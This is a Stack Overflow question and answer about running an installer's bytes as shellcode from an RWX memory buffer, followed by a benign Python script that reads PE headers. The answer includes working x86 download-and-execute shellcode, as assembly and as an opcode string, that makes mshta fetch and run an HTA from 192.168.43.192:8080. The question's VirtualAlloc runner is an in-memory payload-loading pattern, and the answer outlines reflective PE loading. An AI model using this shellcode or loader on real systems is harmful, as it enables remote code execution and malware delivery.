Issue
This content is from Stack Overflow. Question asked by learningaspiring918.
What I have tried:
- I opened the Opera-Setup installer .exe with HxD and exported it as C source code.
- I put the shellcode from the output inside a main function to execute it, like the following:
#include <Windows.h>
#include <string.h>   /* memcpy */

/* Raw bytes of Opera-Setup.exe as exported by HxD (the array is elided here);
   'static' keeps the 1.8 MB array out of the 1 MB default thread stack. */
static unsigned char rawData[1804192] = {
    0x4D, 0x5A, 0x50, ...
};

int main(void)
{
    /* RWX region large enough for the whole file */
    void *exec = VirtualAlloc(0, sizeof(rawData), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (exec == NULL)
        return 1;
    memcpy(exec, rawData, sizeof(rawData));
    ((void(*)())exec)();   /* jumps to offset 0 of the copied file */
    return 0;
}
- Then I compile this C file to an .exe.
But when I then execute it, it just opens a console briefly, and nothing happens afterwards.
The goal I'm trying to reach is that Opera-Setup runs successfully after this process. What am I doing wrong?
Solution
The error is that you're referring to a PE executable as shellcode. For example, this is an actual download-and-execute mshta shellcode:
xor eax, eax ;clear eax,get msvcrt.dll
mov ax, 0x7472 ;"tr\0\0"
push eax
push dword 0x6376736d ;cvsm
push esp
mov ebx,0x77e3395c ;call LoadLibraryA
call ebx
mov ebp,eax ;msvcrt.dll is saved in ebp
;mshta.exe http://192.168.43.192:8080/9MKWaRO.hta
xor eax,eax
PUSH eax
PUSH 0x6174682e ;".hta"
PUSH 0x4f526157 ;"WaRO"
PUSH 0x4b4d392f ;"/9MK"
PUSH 0x38303830 ;"8080"
PUSH 0x3a323931 ;"192:"
PUSH 0x2e33342e ;".43."
PUSH 0x3836312e ;".168"
PUSH 0x3239312f ;"/192"
PUSH 0x2f3a7074 ;"tp:/"
PUSH 0x74682065 ;"e ht"
PUSH 0x78652e61 ;"a.ex"
PUSH 0x7468736d ;"msht"
MOV EDI,ESP ;adding a pointer to the stack
PUSH EDI
Mov eax,0x6ffab16f ;call System
call eax
xor eax, eax
push eax
mov eax, 0x77e3214f ;call ExitProcess
call eax
whose resulting object after assembling would be the actual shellcode (in this case, represented as opcodes):
char code[] = "\x31\xc0\x66\xb8\x72\x74\x50\x68\x6d\x73\x76\x63\x54\xbb\x5c\x39\xe3\x77\xff\xd3\x89\xc5\x31\xc0\x50\x68\x2e\x68\x74\x61\x68\x57\x61\x52\x4f\x68\x2f\x39\x4d\x4b\x68\x30\x38\x30\x38\x68\x31\x39\x32\x3a\x68\x2e\x34\x33\x2e\x68\x2e\x31\x36\x38\x68\x2f\x31\x39\x32\x68\x74\x70\x3a\x2f\x68\x65\x20\x68\x74\x68\x61\x2e\x65\x78\x68\x6d\x73\x68\x74\x89\xe7\x57\xb8\x6f\xb1\xfa\x6f\xff\xd0\x31\xc0\x50\xb8\x4f\x21\xe3\x77\xff\xd0";
When you're passing the bytes of a PE file (Opera-setup.exe) directly and setting a function pointer to offset 0, you're pointing at the DOS header, which does not contain any valid instruction opcodes. What you need to do is parse the PE file, resolve the relocations relative to the parent file, and calculate what the entry point address in the PE file (Opera-setup.exe) would be, normally the address of the start of the .text section.
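To make the answer's point concrete, here is an added example that is not part of the question or the answer: a small header walker that follows the DOS header to the NT headers and the section table of a PE image and reports where AddressOfEntryPoint actually lands (which section, whether that section is executable, the file offset, and whether a base relocation directory exists). It only reads headers; it does not load or run anything, which is the kind of check you do when triaging a binary. The field offsets follow the PE/COFF layout; the image it parses is a constructed, headers-only PE32 built inline so the script runs offline.

```python
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
DIR_BASERELOC = 5            # index of the base relocation data directory


def is_pe(data: bytes) -> bool:
    """True if data carries both the DOS 'MZ' and the NT 'PE\\0\\0' signatures."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def parse_pe(data: bytes) -> dict:
    """Walk DOS header -> NT headers -> section table and locate the entry point."""
    if not is_pe(data):
        raise ValueError("not a PE image (missing MZ/PE signature)")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    coff = e_lfanew + 4                                        # IMAGE_FILE_HEADER
    machine, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20                                            # IMAGE_OPTIONAL_HEADER
    magic = struct.unpack_from("<H", data, opt)[0]
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]    # AddressOfEntryPoint
    if magic == 0x10B:                                         # PE32
        image_base = struct.unpack_from("<I", data, opt + 28)[0]
        dirs = opt + 96
    elif magic == 0x20B:                                       # PE32+
        image_base = struct.unpack_from("<Q", data, opt + 24)[0]
        dirs = opt + 112
    else:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    ndirs = struct.unpack_from("<I", data, dirs - 4)[0]        # NumberOfRvaAndSizes
    reloc_size = 0
    if ndirs > DIR_BASERELOC:
        _, reloc_size = struct.unpack_from("<II", data, dirs + DIR_BASERELOC * 8)

    sections = []
    for i in range(nsections):
        fields = struct.unpack_from("<8sIIIIIIHHI", data, opt + opt_size + i * 40)
        name, vsize, va, rawsize, rawptr = fields[:5]
        sections.append({"name": name.rstrip(b"\0").decode("ascii"),
                         "va": va, "vsize": vsize, "rawptr": rawptr,
                         "rawsize": rawsize, "chars": fields[9]})

    # The entry RVA is meaningful only once mapped to a section; offset 0 of the
    # file is the DOS header, which is data, not code.
    entry_sec = next((s for s in sections
                      if s["va"] <= entry_rva < s["va"] + max(s["vsize"], s["rawsize"])), None)
    if entry_sec is None:
        raise ValueError("AddressOfEntryPoint falls outside every section")
    return {
        "machine": machine,
        "pe32plus": magic == 0x20B,
        "image_base": image_base,
        "entry_rva": entry_rva,
        "entry_va": image_base + entry_rva,          # where it runs if mapped at ImageBase
        "entry_section": entry_sec["name"],
        "entry_section_executable": bool(entry_sec["chars"] & IMAGE_SCN_MEM_EXECUTE),
        "entry_file_offset": entry_rva - entry_sec["va"] + entry_sec["rawptr"],
        "has_relocations": reloc_size > 0,           # must be applied if not at ImageBase
        "sections": sections,
    }


def build_sample_image() -> bytes:
    """Constructed, headers-only PE32 image for the demo (not a real executable)."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                        # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x014C, 3, 0, 0, 0, 224, 0x0102)  # i386, 3 sections
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                          # PE32 magic
    struct.pack_into("<I", opt, 16, 0x1200)                        # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x400000)                      # ImageBase
    struct.pack_into("<II", opt, 32, 0x1000, 0x200)                # Section/FileAlignment
    struct.pack_into("<I", opt, 92, 16)                            # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + DIR_BASERELOC * 8, 0x3000, 0x20)  # .reloc directory

    def sec(name, vsize, va, rawsize, rawptr, chars):
        return struct.pack("<8sIIIIIIHHI", name, vsize, va, rawsize, rawptr, 0, 0, 0, 0, chars)

    return (bytes(dos) + b"PE\0\0" + coff + bytes(opt)
            + sec(b".text", 0x500, 0x1000, 0x600, 0x400, 0x60000020)
            + sec(b".data", 0x100, 0x2000, 0x200, 0xA00, 0xC0000040)
            + sec(b".reloc", 0x20, 0x3000, 0x200, 0xC00, 0x42000040))


if __name__ == "__main__":
    info = parse_pe(build_sample_image())
    print(f"entry RVA {info['entry_rva']:#x} -> VA {info['entry_va']:#x}, "
          f"section {info['entry_section']} (executable={info['entry_section_executable']}), "
          f"file offset {info['entry_file_offset']:#x}, relocations={info['has_relocations']}")
```

Run against a real file by replacing `build_sample_image()` with the file's bytes; the same walk shows why the question's `((void(*)())exec)()` at offset 0 lands on the `MZ` header rather than on `.text`, and the `has_relocations` flag is the signal that a copy placed anywhere other than ImageBase would still need its relocations applied.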
This question was asked on Stack Overflow by learningaspiring918 and answered by Leonyya. It is licensed under the terms of CC BY-SA 2.5 / CC BY-SA 3.0 / CC BY-SA 4.0.